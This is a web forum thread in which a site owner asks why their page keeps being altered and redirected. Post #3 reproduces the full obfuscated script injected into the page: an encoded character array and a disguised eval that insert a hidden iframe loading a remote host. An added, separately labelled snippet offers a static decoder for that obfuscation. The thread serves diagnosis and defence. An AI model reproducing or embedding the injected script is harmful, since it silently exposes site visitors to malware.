  • #1
    New to the CF scene
    Join Date
    May 2012
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Remote File Inclusion?

    Hi!

    I'm having some troubles that my Web Space Provider insists is not their problem. Can you help me?

    The domain in question is youcme.net. I have owned this domain for a few years now but went back a couple of weeks ago to start working on it again. When I checked in to the website following a long period of not checking on it, there was a message across the top of the page which read "you need to pay for this crypt". I searched online and found this to be malware.

    I deleted all my files and started anew. (I was going to do that anyway.)

    (My computer scans clean as well.)

    I created a 2-page webcam site using Dreamweaver 4.0. I added 1 Google Adsense ad and a weather widget from The Weather Network.

    I upload with WSFTP.

    I uploaded the 2 pages and the images, and everything is as it should be. The website displays as it should, on various computers, using various browsers. But then, after 6 to 8 hours, I check the website and my index page has been altered, making the front page display only my background image.

    At first, I simply uploaded again, assuming that I'd made a mistake. Then I started removing the widget or the Google ad one by one and checking to see if that solved the issue. I changed my FTP password and my password for my web space provider, who, by the way, is 1&1.com.

    I've called them 5 times and emailed firstly their tech support people and then their security team. Nothing. "It's a coding issue." Not their problem.

    So, I cleared out another of my domains (www.truckingtanker.com) and uploaded the website there. And I've had no issues. It's stayed as it should for 2 days now.

    I then created a simple one-page website with a background image and 2 sentences of text and uploaded it to youcme.net. It lasted about 8 hours and now when I go to that website, it redirects to igg.biz. I've never heard of them.

    Who is making this happen? How can I stop them?

    Frustrated.
    Last edited by Woothie; 05-12-2012 at 05:37 PM.

  • #2
    Senior Coder
    Join Date
    Feb 2009
    Location
    Ilkley, West Yorkshire, UK
    Posts
    2,950
    Thanks
    9
    Thanked 724 Times in 718 Posts
    Sounds like it might be some sort of js hack.
    Turn js off in your browser and see if you can see anything in the source that looks odd.
    Not to be overly nervous, but I'd suggest removing that link in case there's anything nasty on the other end of the redirect.

  • #3
    New to the CF scene
    Join Date
    May 2012
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thank you. Yes, the code looks odd (as follows). It is certainly not as I wrote it.

    Any idea how to solve it?


    Code:
    <html>
    <head>
    <title>Crazy!</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    
    <body bgcolor="#CCCC66" text="#006600" background="images/bg.jpg" link="#009933"> <script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} 
r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h)e(s);</script>
    <div align="center">
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p><font size="7">This is crazy! <br>
        Leave my site alone!</font></p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p><a href="mailto:contact@youcme.net">contact</a></p>
    </div>
    </body>
    </html>
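
Added example, not part of the original thread: the script in post #3 hides its real code as a list of numbers joined by `c` (see `.split('c')`) and rebuilds each character with `fromCharCode(w[j]*1+42)`. The decoder below reads the separator and offset out of the script text and recovers the hidden code without evaluating anything; `decodeInjectedScript` and `SAMPLE` are names chosen here, and `SAMPLE` is a constructed input that keeps only the first 14 values of the posted array.

```javascript
// Static decoder for the "c-separated numbers + offset" obfuscation in post #3.
// Nothing from the sample is evaluated; the script is treated purely as text.

// Constructed sample: same layout as the injected script, array cut to its
// first 14 values so the listing stays short.
const SAMPLE =
  "f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74'][0].split('c');" +
  "for(;14!=i;i+=1){j=i;s=s+r[\"fromC\"+z](w[j]*1+42);}";

function decodeInjectedScript(scriptText) {
  // Separator: the argument of .split('<sep>')
  const sepMatch = scriptText.match(/\.split\((['"])(.+?)\1\)/);
  // Offset: the constant added to each array element before fromCharCode
  const offMatch = scriptText.match(/\*\s*1\s*([+-])\s*(\d+)/);
  if (!sepMatch || !offMatch) return null;
  const sep = sepMatch[2];
  const offset = (offMatch[1] === "-" ? -1 : 1) * Number(offMatch[2]);

  // Payload: the longest quoted string made only of numbers and the separator
  const esc = sep.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const blobRe = new RegExp(`(['"])((?:-?\\d+${esc})+-?\\d+)\\1`, "g");
  let blob = "";
  for (const m of scriptText.matchAll(blobRe)) {
    if (m[2].length > blob.length) blob = m[2];
  }
  if (!blob) return null;

  const text = blob
    .split(sep)
    .map((n) => String.fromCharCode(Number(n) + offset))
    .join("");
  // URLs in the decoded text are the hosts to look for in proxy or DNS logs
  const urls = text.match(/https?:\/\/[^\s'"<>]+/g) || [];
  return { sep, offset, text, urls };
}

console.log(JSON.stringify(decodeInjectedScript(SAMPLE)));
```

Pasting the full `<script>` element from the altered page into `decodeInjectedScript` as a string returns the hidden JavaScript in `text` and any addresses it loads in `urls`.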

  • #4
    Senior Coder
    Join Date
    Feb 2009
    Location
    Ilkley, West Yorkshire, UK
    Posts
    2,950
    Thanks
    9
    Thanked 724 Times in 718 Posts
    So that odd looking script is the problem by the looks of it.
    I'm not an expert at all in this but I guess that script could be being injected into your page by another file somewhere in your file system on the server - possibly a hangover from the previous problem.

    Certainly sounds like something for your host to me....
    If they're being unsupportive you could try having a look through all of your server files to see if you can spot anything odd, although that might be a needle in a haystack job. I guess it could be something like a cron job that's running periodically and making the change - might be worth having a look there as well.

  • #5
    Master Coder Excavator
    Join Date
    Dec 2006
    Location
    Alaska
    Posts
    9,675
    Thanks
    22
    Thanked 1,827 Times in 1,811 Posts
    Hello Woothie,
    I've had a similar issue with a webspace provider that swore it was not on their end. Turned out something, we never figured out what, was editing my .htaccess file which would then mess up all my php includes.

    It stopped when I made the .htaccess read only.
    Validate often DURING development - Use it like a splelchecker | Debug during Development |Write it for FireFox, ignore IE
    Use the right DocType | Validate your markup | Validate your CSS | Why validating is good | Why tables are bad

